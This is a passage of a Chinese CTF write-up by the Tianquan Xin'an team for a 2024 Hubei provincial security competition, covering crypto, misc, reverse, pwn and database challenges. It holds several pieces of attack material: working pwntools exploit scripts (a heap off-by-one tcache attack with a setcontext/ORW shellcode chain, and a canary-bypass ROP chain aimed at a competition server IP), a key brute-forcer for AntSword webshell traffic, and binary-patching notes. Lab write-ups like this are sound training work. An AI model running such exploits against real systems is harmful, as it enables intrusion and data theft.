13672363312837218411993834816309940812825734002380106434784905443915361955247, 56317025568717741728727542740124505299029374963112095990350877412868385510001*i + 56960621295573230601502052571104746367180500789238336757504091383665514782189)])F =  [(36081831373398765496490121898118275331597167308301671911642273861563666664545*i + 20818485079783326431414952124332440995164298376805349071762867760925654560129, 2080527476644284459469754065728582261439110792635520661740429151724797376184*i + 22485923248080983391383279592637691489160934672854638306617785344436031827838, 15544373162545014827602222261755865080947187122261471926061663568794038512828*i + 65994932829738499994169748656063604384011854387402875895186473718226656419067), (3553534440103543686958858303956716887328727627636404431097647427819509340361*i + 41182149981825439188243414995474733005799065992663037326956422731949977723727, 11444151159046255413538671703716370245288291793592500278345001664024824339590*i + 1802783416049323926195923226865768221398255563865542946492803065162093093803, 15739175840903697568714274177182938758189586472507039731239155962622285528109*i + 38249065906628598713138583591858150126778794837077688369911160900556744463900), (14364753807737302773559096493138893453118094354943941768609481298414054855231*i + 16290236676179704559365899211744462983770375364688247022596145726641137243214, 3863306473986430132042752882629555431418515741358351198972027547882636615940*i + 1209446834271293681961506708684952401569936830292701272655835127315444154958, 21868026584808712490812183410257662299067350008298604021123682243508255905173*i + 12828201007038003022201361213007595366913298546122923089499182187938898042596)]ct =  96910798667771988374291172958072220832574586618080134344021393928577220469428A, T, S, G = [M(ii) for ii in pk]F = M(F)############################################################### attackE = A*T*AdetA, detT, detS, detG, detE, detF = A.det(), T.det(), S.det(), G.det(), E.det(), F.det()r = 2244966557637008779362441591080406338119704738381872153797151#R = 80839783875482453208291688688697485912290384775841712705111124172946909733768714734343762988749579725275997021760357500939#r = discrete_log(detG^R, ((detA^(-1)*detT).sqrt())^R, ord=(p^2-1)//R)#s = discrete_log(((detA^(-2)*detT^(-1)*detF).sqrt())^R, detG^R, ord=(p^2-1)//R)#not enough so use cado-nfs这里不够,用上cado-nfsstep2import subprocesscommand = [    './cado-nfs.py',    '-dlp',    '-ell', str(r),    'target='+str(t1),    str(p)]#1541758195020130454925136833461872657607368759409055632195831command = [    './cado-nfs.py',    '-dlp',    '-ell', str(r),    'target='+str(t2),    str(p)]#780392429787953543532147509264510635118839088869098098140941try:    result = subprocess.run(command, check=True, text=True, capture_output=True)    print(result.stdout)except subprocess.CalledProcessError as e:    print(f"ERROR: {e.returncode}")    print("ERROR:", e.stderr)step3#t2^s = t1Fr = GF(r)s1 = Fr(1541758195020130454925136833461872657607368759409055632195831)s2 = Fr(780392429787953543532147509264510635118839088869098098140941)ss = discrete_log(pow(t1, 6*r, p), pow(t2, 6*r, p), operation="*", ord=(p-1)//r)s = crt([int(ss), int(s1/s2)], [(p-1)//(6*r), r])ss = sfor ii in range(6):    s = ss + ii * (p-1) // 6    D = G^int(s)    K = list(D*S*D)    key = sum(K[0])+sum(K[1])+sum(K[2])    mask = int(sha256(str(key).encode()).hexdigest(),16)    pt = ct ^^ mask    if(D.det()*detE*D.det() == detF):        print(long_to_bytes(pt))        break#QAQ~4_Br0ken_Crypto_Sy5tem~TAT

CRYPTO.05

✦✦✦ 8 ddd

操作内容:

使用工具一把梭

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

MISC.01

✦✦✦ 9 gza_Cracker

操作内容:

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

pass是Antsword

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

key则是在这里面

echo substr(md5($pass.$key),0,16);//前缀echo base64_encode(encode(@run($data),$key)); //加密数据echo substr(md5($pass.$key),16); //后缀

e71f50e9773b23f9 是前缀,根据这个可以爆破key

<?php    $keylist = array(    "123456",    "password",    "12345678",    "1234",    "admin@123",    "pussy",    "12345",    "dragon",    "qwerty",    "696969",    "mustang",    "letmein",    "baseball",    "master",    "michael",    "football",    "shadow",    "monkey",    "abc123",    "pass",    "fuckme",    "6969",    "jordan",    "harley",    "ranger",    "iwantu",    "jennifer",    "hunter",    "fuck",    "2000",    "test",    "batman",    "trustno1",    "thomas",    "tigger",    "robert",    "access",    "love",    "buster",    "1234567",    "soccer",    "hockey",    "killer",    "george",    "sexy",    "andrew",    "charlie",    "superman",    "asshole",    "fuckyou",    "dallas",    "jessica",    "panties",    "pepper",    "1111",    "austin",    "william",    "daniel",    "golfer",    "summer",    "heather",    "hammer",    "yankees",    "joshua",    "Antsw0rd",    "maggie",    "biteme",    "enter",    "ashley",    "thunder",    "cowboy",    "silver",    "richard",    "fucker",    "orange",    "merlin",    "michelle",    "corvette",    "bigdog",    "cheese",    "matthew",    "121212",    "patrick",    "martin",    "freedom",    "ginger",    "blowjob",    "nicole",    "sparky",    "yellow",    "camaro",    "secret",    "dick",    "falcon",    "taylor",    "111111",    "131313",    "123123",    "bitch",    "hello"    );    $pass = "Antsword";    foreach ($keylist as $key)    {        if(substr(md5($pass.substr(md5($key), 0, 16)),0,16)=="e71f50e9773b23f9")        {            echo "key is: ".$key."<br>";            echo "16bit: ".substr(md5($key), 0, 16);        }    }
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

key拿到即可解密:

<?php     function encode($D,$K){    for($i=0;$i<strlen($D);$i++) {        $c = $K[$i+1&15];        $D[$i] = $D[$i]^$c;    }    return $D;    }    $pass='Antsword';    $key = 'a18551e65c48f51e';    $str = "";    $data = encode(base64_decode($str), $key);    echo gzdecode($data);
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

MISC.02

✦✦✦ 10 不良劫

操作内容:

2024 天山固网杯决赛参考链接:

https://blog.jacki.cn/2024/11/29/%E5%A4%A9%E5%B1%B1%E5%9B%BA%E7%BD%91/#CRYPTO-ddd

ps 调整色阶 将非纯黑色变得更明显

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

再进行定位点还原和修补

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

微信扫码:得到 DASCTF{014c6e74-0c4a-48fa 一半flag

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

使用 WaterMarkH 提取盲水印 得到第二半flag -8b33-ced16f847e39}

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

flag值:

DASCTF{014c6e74-0c4a-48fa-8b33-ced16f847e39}

MISC.03

✦✦✦ 11 马赛克

操作内容:

使用工具载入镜像

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

发现有个flag的压缩包。打开发现文件损坏。

还发现一个password的文件

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

打开后发现是图片,改后缀打开,发现密码被打马赛克。

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

将图片缩小,大概能猜出密码是ILIKEFORENSICS

在镜像中还发现了一个奇怪的txt文件,“打乱.txt”

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

导出打开后发现是加密算法

还原后,删除多余的0,使用密码解压,得到flag

 ```f = open('./flag.zip', 'rb').read()n = open('./new.zip', 'wb')L = len(f)for i in range(int(L/10)):    n.write(f[5*i :5*i+5])n.write(f[L-5*i-5:L-5*i])  ```将压缩包还原```with open(r"C:UsersCrazyDesktopflag.zip",'rb') as f:    tmp = f.read()L = len(tmp)print(L)o_f_zip = bytearray(L)for i in range(L//10):    o_f_zip[5*i:5*i+5] = tmp[10*i:10*i+5]    o_f_zip[L-5*i-5:L-5*i] = tmp[10*i+5:10*i+10]with open(r"C:UsersCrazyDesktopflag2.zip",'wb') as f2:    f2.write(o_f_zip)

MISC.04

✦✦✦ 12 特殊的流量

操作内容:

找响应码为200的包,发现有一个压缩包

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

可以看到被替换后的密钥

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

看到edffd5be04cc060e343cad479a8b845c就是secret的md5hash

import hashlibimport itertools# 原始MD5哈希original_md5 = "edffd5be04cc060e343cad479a8b845c"# 替换后的密文ciphertext = "xx34d619x1brxgd9mgd4xzxwxytv669wn"# 定义替换字符集replacement_chars = ['i', '7', 'x']# 获取x的位置x_positions = [i for i, char in enumerate(ciphertext) if char == 'x']# 创建一个掩码,所有位置上的x都将被替换成1或7def generate_candidates():    # 生成所有可能的替换组合    for replacement in itertools.product(replacement_chars, repeat=len(x_positions)):        # 将替换的字符按位置放入密文中        candidate = list(ciphertext)        for pos, replacement_char in zip(x_positions, replacement):            candidate[pos] = replacement_char        yield ''.join(candidate)# 比较每个候选密文的MD5值def crack():    for candidate in generate_candidates():        # 计算候选密文的MD5值        candidate_md5 = hashlib.md5(candidate.encode()).hexdigest()        if candidate_md5 == original_md5:            print(f"Found the original ciphertext: {candidate}")            return candidate    print("No match found.")    return Noneif __name__ == "__main__":    # 执行破解过程
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

爆破得明文:

i734d619i1brigd9mgd4xz7w7ytv669w

继续往下看,输出了一堆密文到flag.txt中

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
U2FsdGVkX18tplkP51SopY26cczUyjuT8tP9j3Ofqv5XF5njA7CygY125iYhxplSQTNoT/kcwoN1z+4a4r/+9JtONfutcHXoyCv2tLseBHr802V/RRtFaZnZc3DM/trRmjk5SAyMSgvN+laSp6uK8eAOq7yKWq7FI+En5cu+j7+bxiuceviSoJ9gEw3SfEMtz4rYbKHagq8aCAlKPEevM+HVSnGSrMoy6QS8oQPgHkafdVj2m1HmfkdQFL5q7qYvrxVlRLbm657I0VIIusf8Q6+rsvlh28HrE3MzLlu6fd/cQ7nsZKuKYo0u4pc/yvI3RZglrd7Fb6piO4ryhs2g1g==

使用工具解密

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

可以看到非数字的英文取首字母,转换后得到flag

flag值:

DASCTF{3fd34b59-4e9d-4390-927b-1346d5364d99}

MISC.05

✦✦✦ 13 PixMatrix

操作内容:

根据题目所说, 图像进行块级转置即可

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
 from PIL import Imageimport numpy as npdef swap_quadrants(block):    """    Swaps the top-right and bottom-left quadrants of an 8x8 block.    Parameters:    block (numpy.ndarray): An 8x8 (or block_size x block_size) array representing the    image block.    Returns:    numpy.ndarray: The block with swapped quadrants.    """    half = block.shape[0] // 2    top_right = block[:half, half:].copy()    bottom_left = block[half:, :half].copy()    # Swap the quadrants    block[:half, half:] = bottom_left    block[half:, :half] = top_right    return blockdef blockwise_transpose(image, block_size=8):    """    Performs a block-wise transpose on the given image by swapping specific quadrants    within each block.    Parameters:    image (PIL.Image.Image): The input image to be processed.    block_size (int): The size of each block (default is 8).    Returns:    PIL.Image.Image: The transposed image.    """    width, height = image.size    image_array = np.array(image)    # Handle grayscale images by ensuring consistent dimensions    if image_array.ndim == 2:        image_array = image_array[:, :, np.newaxis]    channels = image_array.shape[2]    transposed_array = image_array.copy()    for y in range(0, height, block_size):        for x in range(0, width, block_size):            # Extract the block            block = image_array[y:y + block_size, x:x + block_size].copy()            # Ensure the block is the correct size (it might be smaller at the edges)            if block.shape[0] < block_size or block.shape[1] < block_size:                continue            # Swap quadrants within the block            transposed_block = swap_quadrants(block)            # Assign the transposed block back to the array            transposed_array[y:y + block_size, x:x + block_size] = transposed_block    # Remove the singleton dimension for grayscale images    if transposed_array.shape[2] == 1:        transposed_array = transposed_array.reshape((height, width))    return Image.fromarray(transposed_array)def process_image(input_path, output_path, block_size=8, display=False):    """    Processes the image by performing a block-wise transpose and saves the result.    Parameters:    input_path (str): Path to the input image.    output_path (str): Path to save the transposed image.    block_size (int): The size of each block (default is 8).    display (bool): Whether to display the transposed image (default is False).    """    try:        # Open the image        with Image.open(input_path) as img:            # Perform block-wise transpose            transposed_img = blockwise_transpose(img, block_size)            # Save the transposed image            transposed_img.save(output_path)            print(f"Transposed image saved as {output_path}.")            # Optionally display the image            if display:                transposed_img.show()    except Exception as e:        print(f"An error occurred: {e}")if __name__ == "__main__":    # Define input and output paths    input_image_path = "PixMatrix.jpg"  # Update with your image file    output_image_path = "transposed_image.jpg"  # Update with desired output path    # Process the image    process_image(input_image_path, output_image_path, block_size=8, display=True)

REVERSE.01

✦✦✦ 14 bouquet

操作内容:

无壳32位,题目上说有花指令,找爆红

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

U一下c一下nop掉再按p分析函数去花;

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

Shift+f12

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

检测到可疑字符串

我们可以使用动调检测一下,单字节比较

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

于是写脚本爆破

import subprocessimport timedef execute_process_with_input_data(executable_path, input_payload, timeout=10):    """    启动外部程序,并通过管道与其交互,返回标准输出和错误输出。    :param executable_path: 可执行文件路径    :param input_payload: 传递给外部程序的输入数据    :param timeout: 超时时间    :return: (标准输出, 错误输出) 元组    """    try:        # 启动外部进程并通过管道与其交互        process_handler = subprocess.Popen(            executable_path,            stdin=subprocess.PIPE,            stdout=subprocess.PIPE,            stderr=subprocess.PIPE,            text=True        )        # 使用 communicate 方法发送输入并获取输出        standard_output, error_output = process_handler.communicate(input=input_payload, timeout=timeout)        return standard_output, error_output    except subprocess.TimeoutExpired:        process_handler.kill()  # 如果超时,则终止进程        standard_output, error_output = process_handler.communicate()        return "Execution Timed Out", error_outputdef generate_input_payload(char_array, outer_index, test_char):    """    根据外部索引和字符集构建输入数据。    :param char_array: 当前字符数组    :param outer_index: 外部索引    :param test_char: 当前测试字符    :return: 构建的输入数据    """    char_array[outer_index] = test_char  # 修改当前字符位置    return ''.join(char_array) + "n"  # 构建输入数据def check_output_lines(standard_output, expected_lines):    """    检查输出行数是否符合预期。    :param standard_output: 外部程序的标准输出    :param expected_lines: 期望的输出行数    :return: 如果输出行数符合预期则返回 True,否则返回 False    """    output_lines = standard_output.split("n")    return len(output_lines) == expected_linesdef main():    executable_path = "bouquet.exe"  # 可执行文件路径    char_array = ['*'] * 25  # 初始化字符数组    char_set = 'j7aw_sC3addq4TAo}8_Fda{SD'  # 字符集    # 外层循环遍历字符位置    for outer_index in range(25):        # 内层循环遍历字符集        for test_char in char_set:            # 构建输入数据            input_payload = generate_input_payload(char_array, outer_index, test_char)            # 执行进程并获取输出            standard_output, error_output = execute_process_with_input_data(executable_path, input_payload)            # 计算期望的输出行数            expected_lines = 49 - outer_index * 2            # 检查输出行数是否符合预期            if check_output_lines(standard_output, expected_lines):                print(test_char, end="")  # 如果符合条件,打印当前字符                break  # 退出内层循环继续下一位置的字符测试if __name__ == "__main__":main()

flag值:

DASCTF{asd48_daj7w_3adqo}

REVERSE.02

✦✦✦ 15 go_bytes

操作内容:

从题目中可以看出是go语言写的

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

·  runtime_stringtoslicebyte() 可能是一个将字符串转换为字节切片的函数。

·  循环内部,似乎在对某些数据进行处理,通过位操作(如右移和按位或)来修改数据。这可能是对输入数据的加密或某种算法的执行。

栈空间管理:程序在开始时会检查栈是否足够,如果不足则请求更多的栈空间。

内存分配与初始化:通过 runtime_newobject() 创建新的对象,并初始化其值。

数据处理与加密:代码通过复杂的位操作对数据进行处理,可能涉及加密算法或数据转换。

数据验证:对处理后的数据进行验证,确保其符合预期。如果数据不匹配,则程序会退出并输出错误信息。

文件/流操作:在多个地方进行格式化的输入输出操作。

数据通过 v12[j] 与计算出的 main_tmp ^ v8 进行验证。如果不匹配,程序会通过 fmt_Fprintln() 打印错误信息,并调用 os_Exit(v9) 退出程序。

 import binasciidef generate_calculated_values(initial_value, num_values=40, multiplier=291, addend=1110, mask=0xFFFF):    """    生成一系列按给定公式计算的数值。    :param initial_value: 初始值    :param num_values: 要生成的数值数量    :param multiplier: 乘数    :param addend: 加数    :param mask: 位掩码,确保结果不超过16位    :return: 计算后的数值列表    """    values = []    current_value = initial_value    for _ in range(num_values):        current_value = (multiplier * current_value + addend) & mask  # 公式计算并确保结果不超过16位        values.append(current_value)    return valuesdef xor_data_with_values(data, values):    """    对数据进行逐元素的异或运算。    :param data: 需要处理的原始数据    :param values: 用于异或运算的数值列表    :return: 处理后的数据列表    """    return [data[i] ^ values[i] for i in range(len(data))]def modify_data_order(data):    """    将数据的最后一个字节移到最前面,其他字节向后移动。    :param data: 输入数据    :return: 修改后的数据    """    return bytes([data[-1]]) + data[:-1]def main():    # 原始数据,十六进制格式    hex_numbers = [        0x22B9, 0x0C9F8, 0x8C89, 0x0FF18, 0x1439, 0x4E0A, 0x2A8B, 0x7CB,        0x0BDEB, 0x0FAAB, 0x3FFB, 0x784B, 0x9F1E, 0x4FEB, 0x4D0B, 0x0D08E,        0x38BB, 0x0CBAE, 0x0D2CE, 0x913E, 0x0A6B, 0x0F03B, 0x507B, 0x398B,        0x93DE, 0x3CCE, 0x459E, 0x4ABE, 0x553E, 0x316E, 0x33BE, 0x42FE,        0x0CECE, 0x4DDE, 0x982B, 0x0A31B, 0x802E, 0x12EE, 0x0F67A, 0x0EB79    ]    # 初始值    initial_value = 0xdead    # 生成经过公式计算的数值    calculated_values = generate_calculated_values(initial_value)    # 对原始数据进行异或运算    modified_numbers = xor_data_with_values(hex_numbers, calculated_values)    # 将处理后的数据转换为字节流    hex_data = binascii.hexlify(bytes(modified_numbers))    # 将字节流最后一个字节移到最前面    modified_data = modify_data_order(hex_data)    # 输出结果    print("Modified Data:", modified_data)# 运行主函数if __name__ == "__main__":    main()

flag值:

DASCTF{faddff8cb4d711edbb2294085339ce84}

REVERSE.03

✦✦✦ 16 Zistel

操作内容:

ELF文件,拖入ida看一下

进去之后f5可以看到三行代码,可以跟进第一个函数

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

跟进之后看到了一个sub_10021BA函数

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

进去看一下

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

在32行那里看到了input字样

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

可以看出是让我们输入,目前看不出什么,我们进行ida远程调试,看一下在哪进行加密操作

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

这里看到了可疑的函数

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

里面好多内联汇编代码

初始化了寄存器和栈上的数据。

使用SIMD指令进行高效的数据存储和加载。

对输入数据进行迭代处理,可能在进行某种加密、散列或校验计算。具体的计算使用了sub_100261B函数和异或运算。

最终将计算结果存储到xmm0寄存器,并返回一个__int64类型的结果

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

在上一级函数中下面看到了一个dword,双击进去

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

怀疑是密文,继续审计

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

这里是一些验证,有try again和correct的字样

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

在这个函数中可以看出一些yihuo字节交换,和迭代处理的操作

代码:

 #include <stdio.h>#include <stdint.h>#include <string.h>typedef uint32_t uint32;uint32 data1[] = {0x33293158, 0x60760211, 0x42185F46, 0x63746F29};uint32 data2[] = {    0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,    0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,    0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,    0xBBDBD183, 0x05340F2E};uint32 lookup_table[0x100];void byte_swap(uint32 *num) {    unsigned char *byte_ptr = (unsigned char*) num;    unsigned char temp;    for (int i = 0; i < 2; ++i) {        temp = byte_ptr[i];        byte_ptr[i] = byte_ptr[3 - i];        byte_ptr[3 - i] = temp;    }}int main() {    // 初始化 lookup_table    for (int i = 0; i < 0x100; ++i) {        lookup_table[i] = i & 3;    }    for (int idx = 0; idx < 4; idx += 2) {        uint32 first = data1[idx];        uint32 second = data1[idx + 1];        for (int j = 19; j >= 0; --j) {            uint32 temp = second;            second ^= data2[j];            for (int k = 0; k < 4; ++k) {                uint8_t temp_idx = lookup_table[(data2[j] >> (k * 8)) & 0xff];                uint8_t temp_val = (second >> (k * 8)) & 0xff;                unsigned char second_byte_array[4];                memcpy(second_byte_array, &second, sizeof(second));                unsigned char tmp = second_byte_array[k];                second_byte_array[k] = second_byte_array[temp_idx];                second_byte_array[temp_idx] = tmp;                memcpy(&second, second_byte_array, sizeof(second));            }            second ^= data2[j];            second ^= first;            first = temp;        }
flag值:

DASCTF{z1g_I3_S0_Coo0l!}

PWN.01

✦✦✦ 17 EZheap_2

操作内容:

Off by one漏洞,堆菜单题目,固定模板构造堆块重叠,Show能泄露pie或者堆地址,这里选择pie地址,这样就能tcachebin attack打stdout,泄露出libc地址,然后2.27orw固定模板直接梭哈

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

代码:

 from pwn import *from struct import packfrom ctypes import *from LibcSearcher import *import base64import gmpy2li = lambda x : print('x1b[01;38;5;214m' + x + 'x1b[0m')ll = lambda x : print('x1b[01;38;5;1m' + x + 'x1b[0m')def s(a):    p.send(a)def sa(a, b):    p.sendafter(a, b)def sl(a):    p.sendline(a)def sla(a, b):    p.sendlineafter(a, b)def r():    p.recv()def pr():    print(p.recv())def rl(a):    return p.recvuntil(a)def inter():    p.interactive()def bug():    gdb.attach(p)    pause()def get_addr():    return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))def get_addr1():    return u32(p.recvuntil("xf7")[-4:].ljust(4,b"x00"))def get_sb():    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))context(os='linux', arch='amd64', log_level='debug')#p = process('./pwn')p = remote('', )elf = ELF('./pwn')#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")libc=ELF("/root/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6")def cmd(i):    sla(b'Your choice:',str(i))def add(idx,size):    cmd(1)    sla(b'index:',str(idx))    sla(b'Size:',str(size))def edit(idx,con):    cmd(2)    sla(b'index:',str(idx))    sa(b'context:',con)def free(idx):    cmd(3)    sla(b'index:',str(idx))def show(idx):    cmd(4)        sla(b'choose:',str(idx))add(0,0x18)  #0add(1,0x68)  #1add(2,0x68)  #2add(3,0x18)  #3add(10,0x68)  #2add(11,0x68)  #2edit(0,b'x00'*0x18+p8(0xe1))free(1)add(4,0xd8)  show(4)rl(b'n')pie=int(p.recv(14),16)-0x202160free(10)free(11)free(2)edit(4,b'a'*0x68+p64(0x71)+p64(pie+0x202020)) add(5,0x68)add(6,0x68)add(7,0x68)edit(7,p64(0xfbad1800) + p64(0)*3 + b'x00')libc_base=get_addr()-0x3ed8b0li(hex(libc_base))rdi = libc_base+libc.search(asm("pop rdinret")).__next__()rsi = libc_base+libc.search(asm("pop rsinret")).__next__()rdx = libc_base+libc.search(asm("pop rdxnret")).__next__()rax = libc_base+libc.search(asm("pop raxnret")).__next__()ret = libc_base+libc.search(asm("ret")).__next__()syscall=libc_base+libc.search(asm("syscallnret")).__next__()jmp_rsp=libc_base+libc.search(asm("jmp rsp")).__next__()free_hook=libc_base+libc.sym['__free_hook']setcontext=libc_base+libc.sym['setcontext']+53open_addr=libc_base+libc.sym['open']read_addr=libc_base + libc.sym['read']write_addr=libc_base + libc.sym['write']payload=(b'x00'*0x68+p64(0)+p64(free_hook&0xfffffffffffff000)+p64(0)*2+p64(0x2000)).ljust(0xa0,b'x00')+p64(free_hook&0xfffffffffffff000)+p64(syscall)free(5)edit(4,b'x00'*0x68+p64(0x71)+p64(free_hook)) add(5,0x68)add(6,0x68)edit(6,p64(setcontext))add(15,0x400)edit(15,payload)free(15)payload  = p64(rdi)+p64(free_hook&0xfffffffffffff000)payload += p64(rsi)+p64(0x1000)payload += p64(rdx)+p64(7)payload += p64(rax)+p64(10)payload += p64(syscall)payload += p64(jmp_rsp)payload += asm(shellcraft.open('/flag'))payload += asm(shellcraft.read(3,free_hook+0x300,0x30))payload += asm(shellcraft.write(1,free_hook+0x300,0x30))sl(payload)inter()
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

flag值:

DASCTF{10737193860912531286748686403102}

PWN.02

✦✦✦ 18 Inequable Canary

操作内容:

源鲁杯原题,除了交互不一样,其他都一样

链接:

https://xz.aliyun.com/t/15840?time__1311=GqjxnDgDyC0QDsD7zG7W%3DqxWw8iVWiW4D#toc-4

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

代码:

 from pwn import*def s(a):  p.send(a)def sa(a,b):  p.sendafter(a,b)def inter():  p.interactive()context(log_level = 'debug',arch = 'amd64')p=remote("139.155.126.78",27641)elf=ELF('./canary')vuln=0x400820stack_fail_got=0x601038sa("Say some old spells to start the journeyn",p64(vuln))sa("Tell me the location of the Eye of the Deep Sean",b'a'*8+p64(stack_fail_got))sa("I have magicn",p64(0x400a5f)) #pop 3pop_rdi=0x400a63pop_rsi_r15=0x400a61read_got=0x601040write_addr=0x4006E0payload=p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(write_addr)+p64(vuln)sa("Let's go!n",payload)libc_base=u64(p.recvuntil('x7f')[-6:].ljust(8, b'x00'))-0x10e1e0bss=0x601060+0x800sa("Tell me the location of the Eye of the Deep Sean",b'a'*8+p64(bss))sa("I have magicn",b'flagx00x00x00x00') #pop 3pop_rdi=0x400a63pop_rsi_r15=0x400a61read_got=0x601040write_addr=0x4006E0pop_rax=libc_base+0x36174pop_rdx_r12=libc_base+0x119431 syscall_ret=libc_base+0x47656 #syscall pop_rbp retpayload=p64(pop_rdi)+p64(bss)+p64(pop_rsi_r15)+p64(0)*2+p64(pop_rax)+p64(2)+p64(syscall_ret)+p64(0) #openpayload+=p64(pop_rdi)+p64(3)+p64(pop_rsi_r15)+p64(bss+0x100)*2+p64(pop_rdx_r12)+p64(0x100)*2+p64(pop_rax)+p64(0)+p64(syscall_ret)+p64(0)#readpayload+=p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(bss+0x100)*2+p64(pop_rdx_r12)+p64(0x100)*2+p64(pop_rax)+p64(1)+p64(syscall_ret)+p64(0)sa("Let's go!n",payload)inter()
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

flag值:

DASCTF{95400240268504043541865376132978}

DB.01

✦✦✦ 19 DB

操作内容:

正则匹配匹配出来

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

代码:

 import reimport csvdef validate_phone(phone):    """    Validates if a given phone number is a valid 11-digit number    and matches the specified prefixes.    """    valid_prefixes = [        '734', '735', '736', '737', '738', '739', '747', '748', '750', '751', '752', '757', '758', '759', '772',        '778', '782', '783', '784', '787', '788', '795', '798', '730', '731', '732', '740', '745', '746', '755',        '756', '766', '767', '771', '775', '776', '785', '786', '796', '733', '749', '753', '773', '774', '777',        '780', '781', '789', '790', '791', '793', '799'    ]    return re.fullmatch(r'd{11}', phone) and phone[:3] in valid_prefixes# Read the data file, extract potential numbers, filter valid ones, and write to CSVwith open("a.txt", encoding="utf-8") as file:    data = file.read()potential_numbers = re.findall(r'bd{11}b', data)valid_numbers = [num for num in potential_numbers if validate_phone(num)]output_data = [["category", "value"]] + [["phone", num] for num in valid_numbers]with open("output.csv", mode="w", encoding="utf-8", newline="") as csvfile:    writer = csv.writer(csvfile)    writer.writerows(output_data)print(f"Extracted {len(valid_numbers)} valid phone numbers. Results saved to output.csv.")

-- 结束 --

以上为本次比赛WP如有问题请留言私信公众号

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

赛事举办联系方式

联系人:张先生

VX:Evan-xuanjing

邮箱:[email protected]

往期回顾

UCTC CTF 2024高校新生网安赛 部分WriteUp

UCTC CTF 2024高校新生网安赛线上赛事圆满落幕

2024河北科技大学“鸿网杯”信息安全竞赛即将开启,蓄势待发!

-天权信安网络安全团队-

网络无边 安全有界

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
2022,感恩有您
2023,携手同行

 用技术撬动未来,用奋斗描绘成功!

  天权信安网络安全团队(简称“天权信安”),成立于2022年,是一支研究红蓝对抗、内网渗透、红队武器库、CTF竞赛及其网安相关活动的安全团队。这里聚集着一群有技术有担当有理想、热爱信安奉献信安的多方面专业人才。天权信安的“天权”来源于北斗七星,又称为文曲星,它代表着天资聪颖,能力超群,也象征着天权信安的高标准、高水平与高质量,体现着我们的宗旨--打造一支作风优良、实力强劲、团结协作的精英团队,用技术与毅力共同守护网络安全。目前成员 40 余人,成员也来自于黄鹤网络安全实验室,队员分布于阿尔托大学(国外)、科大、华科、电子科大、警大、江苏海洋大学、国际关系学院、广大、河北师大、吉林师大、西南石油、安工院、湖工大、华师大、湘大、湖南工程学院等国内各大高校,也分布于绿盟科技、奇安信、长亭科技、安恒信息、联通、移动等国内大厂。为“网络安全爱好者”提供一个更好的学习交流生态圈,天权信安欢迎技术大咖、攻防渗透、CTF选手等资深专业人士前来分享网络安全前沿技术、攻防实战经验、内网渗透、IOT安全、电子取证、CTF、APT、工控安全等技术,通过经验分享,来帮助大家了解最新网络安全动态,提升安全技术水平,拓宽知识领域,致力于打造一个开放共享的网络安全生态圈。

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

